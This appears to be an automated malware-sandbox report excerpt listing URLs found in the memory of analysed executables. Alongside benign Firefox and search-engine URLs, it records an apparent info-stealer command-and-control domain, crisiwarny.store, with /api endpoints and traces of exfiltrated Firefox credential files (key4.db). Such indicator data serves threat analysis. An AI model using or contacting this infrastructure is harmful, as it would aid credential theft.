Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180use
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.s
Source: e192e43b61.exe, 0000000D.00000003.2806047135.000000000111B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/(
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/.B64
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store//
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2936438339.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/1
Source: file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/?
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/A
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/B
Source: e192e43b61.exe, 0000000B.00000003.2883813497.000000000145F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/G
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/HEFM
Source: e192e43b61.exe, 0000000A.00000003.2606262886.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608822442.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/I
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/P
Source: e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/PW
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/R
Source: e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/T
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/Y
Source: e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiF9
Source: e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiP
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiS
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiT
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2843716285.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883708790.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibu
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibuE
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibue
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apig
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apig9x
Source: file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apipd
Source: file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apire1
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804018008.0000000001782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apis
Source: file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apis9x
Source: e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1804018008.000000000177C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1799770952.000000000177C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/e-
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/em
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/hi39
Source: e192e43b61.exe, 0000000D.00000003.2792073053.000000000111B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/i
Source: e192e43b61.exe, 0000000B.00000003.2755425004.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/lB
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/r
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/rdVPr
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/s
Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2639716464.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640641696.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/y
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api2o4p.default-release/key4.dbPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api=
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiF
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apin.txtPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiw
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsTim
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
